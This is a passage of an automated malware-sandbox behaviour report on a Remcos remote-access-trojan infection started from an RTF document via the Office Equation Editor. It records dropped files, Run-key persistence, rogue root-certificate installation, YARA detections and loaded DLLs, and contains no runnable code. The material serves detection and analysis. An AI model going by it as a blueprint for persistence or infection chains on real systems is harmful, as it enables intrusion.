                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: bcrypt.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: endpointdlp.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: eamsi.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: smartscreenps.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: am.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: winmm.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: secur32.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: webio.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: ??.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: ???y.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: ????.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: ???2.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: ???.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: ??????s.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: credssp.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: bcrypt.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Section loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeSection loaded: ??.dllJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                        Source: OKhCyJ619J.LNK.0.drLNK file: ..\..\..\..\..\Desktop\OKhCyJ619J.rtf
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                        Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: hjc.exe, 00000005.00000003.369004868.000000007E560000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdb source: hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, easinvoker.exe.5.dr
                        Source: Binary string: easinvoker.pdbH source: hjc.exe, 00000005.00000003.369109514.000000001573E000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.376031931.00000000145E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000002.379695634.000000007E2E0000.00000004.00000800.00020000.00000000.sdmp, hjc.exe, 00000005.00000003.368787368.000000007DD50000.00000004.00000800.00020000.00000000.sdmp, Rdxcjsng.PIF, 0000000C.00000002.399328238.00000000145DF000.00000004.00000800.00020000.00000000.sdmp, easinvoker.exe.5.dr

                        Data Obfuscation

                        Source: Yara matchFile source: 5.2.hjc.exe.318e1e0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.Rdxcjsng.PIF.3003d38.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.312984c.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.Rdxcjsng.PIF.2fe2a1c.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.Rdxcjsng.PIF.3003d38.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.318e1e0.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.316cd44.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.hjc.exe.3230000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000019.00000002.493989881.0000000003191000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.396383723.0000000002FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000011.00000002.432128684.0000000003321000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000002.465177486.00000000030A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.846066599.0000000003331000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.374221550.0000000003231000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.396855031.00000000031D1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.374068622.0000000003130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CA6A63 LoadLibraryA,GetProcAddress,5_2_15CA6A63
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .
                        Source: remcos.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x19549d
                        Source: HJC[1].exe.2.drStatic PE information: real checksum: 0x0 should be: 0x19549d
                        Source: hjc.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x19549d
                        Source: netutils.dll.5.drStatic PE information: real checksum: 0x2c00d should be: 0x1f08e
                        Source: Rdxcjsng.PIF.8.drStatic PE information: real checksum: 0x0 should be: 0x19549d
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: .
                        Source: netutils.dll.5.drStatic PE information: section name: /4
                        Source: netutils.dll.5.drStatic PE information: section name: /19
                        Source: netutils.dll.5.drStatic PE information: section name: /31
                        Source: netutils.dll.5.drStatic PE information: section name: /45
                        Source: netutils.dll.5.drStatic PE information: section name: /57
                        Source: netutils.dll.5.drStatic PE information: section name: /70
                        Source: netutils.dll.5.drStatic PE information: section name: /81
                        Source: netutils.dll.5.drStatic PE information: section name: /92
                        Source: easinvoker.exe.5.drStatic PE information: section name: .imrsiv
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540140 push esi; retf 2_2_03540171
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540160 push esi; retf 2_2_03540171
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CD4E56 push ecx; ret 5_2_15CD4E69
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_15CF7A28 push eax; ret 5_2_15CF7A46
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03236372 push 032363CFh; ret 5_2_032363C7
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03236374 push 032363CFh; ret 5_2_032363C7
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0324D20C push ecx; mov dword ptr [esp], edx5_2_0324D211
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0325A2F4 push 0325A35Fh; ret 5_2_0325A357
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_032332F0 push eax; ret 5_2_0323332C
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0325A144 push 0325A1ECh; ret 5_2_0325A1E4
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0325A1F8 push 0325A288h; ret 5_2_0325A280
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03243027 push 03243075h; ret 5_2_0324306D
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03243028 push 03243075h; ret 5_2_0324306D
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0325A0AC push 0325A125h; ret 5_2_0325A11D
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0323673E push 03236782h; ret 5_2_0323677A
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03236740 push 03236782h; ret 5_2_0323677A
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0323C528 push ecx; mov dword ptr [esp], edx5_2_0323C52D
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0323D55C push 0323D588h; ret 5_2_0323D580
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03249B58 push 03249B90h; ret 5_2_03249B88
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03259B58 push 03259D76h; ret 5_2_03259D6E
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0323CBA8 push 0323CD2Eh; ret 5_2_0323CD26
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03246904 push 032469AFh; ret 5_2_032469A7
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03246902 push 032469AFh; ret 5_2_032469A7
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_032478C8 push 03247945h; ret 5_2_0324793D
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0323C8D6 push 0323CD2Eh; ret 5_2_0323CD26
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03242F1C push 03242F92h; ret 5_2_03242F8A
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_0325DF18 push eax; ret 5_2_0325DFE8
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03245E38 push ecx; mov dword ptr [esp], edx5_2_03245E3A
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03247CA6 push 03247CE0h; ret 5_2_03247CD8
                        Source: C:\Users\user\AppData\Roaming\hjc.exeCode function: 5_2_03247CA8 push 03247CE0h; ret 5_2_03247CD8
                        Source: C:\ProgramData\Remcos\remcos.exeCode function: 9_2_2DE92806 push ecx; ret 9_2_2DE92819

                        Persistence and Installation Behavior

                        Source: C:\Windows\SysWOW64\extrac32.exe File created: C:\Users\Public\Libraries\Rdxcjsng.PIF
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540451 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_03540451
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\hjc.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\hjc.exeFile created: C:\ProgramData\Remcos\remcos.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\hjc.exeFile created: C:\Users\Public\Libraries\easinvoker.exeJump to dropped file
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HJC[1].exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\hjc.exeFile created: C:\Users\Public\Libraries\netutils.dllJump to dropped file

                        Boot Survival

                        Source: C:\Users\user\AppData\Roaming\hjc.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1
                        Source: C:\Users\user\AppData\Roaming\hjc.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Rdxcjsng
                        Source: C:\Users\user\AppData\Roaming\hjc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-L24XL1Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exe, Code function: 5_2_03249B94 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_03249B94
                        Source: C:\Users\user\AppData\Roaming\hjc.exe, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                        Source: C:\Users\user\AppData\Roaming\hjc.exe, Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\hjc.exe, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\hjc.exe, Process information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exe, Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
